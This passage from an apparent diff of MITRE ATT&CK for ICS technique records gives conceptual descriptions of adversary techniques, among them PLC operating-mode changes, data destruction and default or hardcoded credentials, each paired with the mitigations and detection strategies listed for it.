+                    "description": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download.   Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:  \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017)  \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007)  (Citation: N.A. October 2017) (Citation: PLCgurus 2021)   \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021)    \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007)   \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007)   \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "execution"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0858",
+                            "external_id": "T0858"
+                        },
+                        {
+                            "source_name": "Machine Information Systems 2007",
+                            "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ",
+                            "url": "http://www.machine-information-systems.com/How_PLCs_Work.html"
+                        },
+                        {
+                            "source_name": "N.A. October 2017",
+                            "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ",
+                            "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489"
+                        },
+                        {
+                            "source_name": "Omron",
+                            "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28  PLC Different Operating Modes Retrieved. 2021/01/28 ",
+                            "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified."
+                        },
+                        {
+                            "source_name": "PLCgurus 2021",
+                            "description": "PLCgurus 2021 PLC Basics  Modes Of Operation Retrieved. 2021/01/28 ",
+                            "url": "https://www.plcgurus.net/plc-basics/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-04-16 21:26:11.583000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0755: Detection of Change Operating Mode"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Command-Line Interface",
+                    "description": "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.\n\nCLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP.  Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0807",
+                            "external_id": "T0807"
+                        },
+                        {
+                            "source_name": "Enterprise ATT&CK January 2018",
+                            "description": "Enterprise ATT&CK 2018, January 11 Command-Line Interface Retrieved. 2018/05/17 ",
+                            "url": "https://attack.mitre.org/wiki/Technique/T1059"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-04-16 21:26:11.069000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0938: Execution Prevention",
+                            "M0942: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0760: Detection of Command-Line Interface"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Commonly Used Port",
+                    "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. \n \n * TCP:80 (HTTP) \n * TCP:443 (HTTPS) \n * TCP/UDP:53 (DNS) \n * TCP:1024-4999 (OPC on XP/Win2k3) \n * TCP:49152-65535 (OPC on Vista and later) \n * TCP:23 (TELNET) \n * UDP:161 (SNMP) \n * TCP:502 (MODBUS) \n * TCP:102 (S7comm/ISO-TSAP) \n * TCP:20000 (DNP3) \n * TCP:44818 (Ethernet/IP)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0885",
+                            "external_id": "T0885"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Matan Dobrushin - Otorio"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-04-16 21:26:19.961000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0804: Human User Authentication",
+                            "M0930: Network Segmentation",
+                            "M0931: Network Intrusion Prevention",
+                            "M0942: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0736: Detection of Commonly Used Port"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "Data Destruction",
+                    "description": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)\n\nData destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident.\n\nStandard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0809",
+                            "external_id": "T0809"
+                        },
+                        {
+                            "source_name": "Enterprise ATT&CK January 2018",
+                            "description": "Enterprise ATT&CK 2018, January 11 File Deletion Retrieved. 2018/05/17 ",
+                            "url": "https://attack.mitre.org/wiki/Technique/T1107"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Matan Dobrushin - Otorio"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2025-04-16 21:26:14.108000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0922: Restrict File and Directory Permissions",
+                            "M0926: Privileged Account Management",
+                            "M0953: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0758: Detection of Data Destruction"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Device Restart/Shutdown",
+                    "description": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.\n\nUnexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states.\n\nA device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0816",
+                            "external_id": "T0816"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-04-16 21:26:11.395000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic",
+                            "M0942: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0801: Detection of Device Restart/Shutdown"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "External Remote Services",
+                    "description": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)\n\nExternal remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. \n\nAs they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0822",
+                            "external_id": "T0822"
+                        },
+                        {
+                            "source_name": "Daniel Oakley, Travis Smith, Tripwire",
+                            "description": "Daniel Oakley, Travis Smith, Tripwire   Retrieved. 2018/05/30 ",
+                            "url": "https://attack.mitre.org/wiki/Technique/T1133"
+                        },
+                        {
+                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
+                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
+                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2025-04-16 21:26:16.385000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0918: User Account Management",
+                            "M0927: Password Policies",
+                            "M0930: Network Segmentation",
+                            "M0932: Multi-factor Authentication",
+                            "M0935: Limit Access to Resource Over Network",
+                            "M0936: Account Use Policies",
+                            "M0942: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0803: Detection of External Remote Services"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Graphical User Interface",
+                    "description": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.\n\nIf physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0823",
+                            "external_id": "T0823"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2025-04-16 21:26:17.144000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0816: Mitigation Limited or Not Effective"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0772: Detection of Graphical User Interface"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3e9b182e-e493-49e1-9a9b-bd0dfcd34a7c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:50:35.222000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Insecure Credentials",
+                    "description": "Adversaries may target insecure credentials as a means to persist on a system or device or move laterally from one system or device to another. Insecure credentials may appear as default credentials which are pre-configured credentials on a system, device, or software that are well-known in documentation or hard-coded credentials which are built into the system, device, or software that cannot be changed or not easily changed because of the impact on control processes.(Citation: NIST SP 800-82r3)(Citation: ICS-ALERT-13-164-01)(Citation: OT IceFall)\n Adversaries often times use insecure credentials to evade detection as they are typically forgotten about by system and device owners.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1694",
+                            "external_id": "T1694"
+                        },
+                        {
+                            "source_name": "ICS-ALERT-13-164-01",
+                            "description": "Cybersecurity and Infrastructure Security Agency (CISA). (2013, October 29). Medical Devices Hard-Coded Passwords. Retrieved April 23, 2026.",
+                            "url": "https://www.cisa.gov/news-events/ics-alerts/ics-alert-13-164-01"
+                        },
+                        {
+                            "source_name": "OT IceFall",
+                            "description": "Forescout Vedere Labs. (2022, June). OT: IceFall Report. Retrieved April 23, 2026.",
+                            "url": "https://www.forescout.com/resources/ot-icefall-report/"
+                        },
+                        {
+                            "source_name": "NIST SP 800-82r3",
+                            "description": "Keith Stouffer. (2023, September). Guide to Operational Technology  (OT) Security. Retrieved April 22, 2026.",
+                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2026-04-23 19:29:41.601000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0801: Access Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0905: Detection of Insecure Credentials"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5658ad88-7510-490e-a351-95d50b1bcd91",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:19.020000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Default Credentials",
+                    "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed.(Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1694/001",
+                            "external_id": "T1694.001"
+                        },
+                        {
+                            "source_name": "Keith Stouffer May 2015",
+                            "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ",
+                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2026-04-23 19:30:36.158000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0801: Access Management",
+                            "M0927: Password Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0756: Detection of Default Credentials"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6b335943-c3af-430e-a135-ab09623bdc20",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:19.528000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Hardcoded Credentials",
+                    "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset.(Citation: ICS-ALERT-13-164-01)(Citation: OT IceFall)\n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1694/002",
+                            "external_id": "T1694.002"
+                        },
+                        {
+                            "source_name": "ICS-ALERT-13-164-01",
+                            "description": "Cybersecurity and Infrastructure Security Agency (CISA). (2013, October 29). Medical Devices Hard-Coded Passwords. Retrieved April 23, 2026.",
+                            "url": "https://www.cisa.gov/news-events/ics-alerts/ics-alert-13-164-01"
+                        },
+                        {
+                            "source_name": "OT IceFall",
+                            "description": "Forescout Vedere Labs. (2022, June). OT: IceFall Report. Retrieved April 23, 2026.",
+                            "url": "https://www.forescout.com/resources/ot-icefall-report/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2026-04-23 19:32:38.851000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0801: Access Management"
+                        ],
+                        "new": [],
+                        "dropped": []
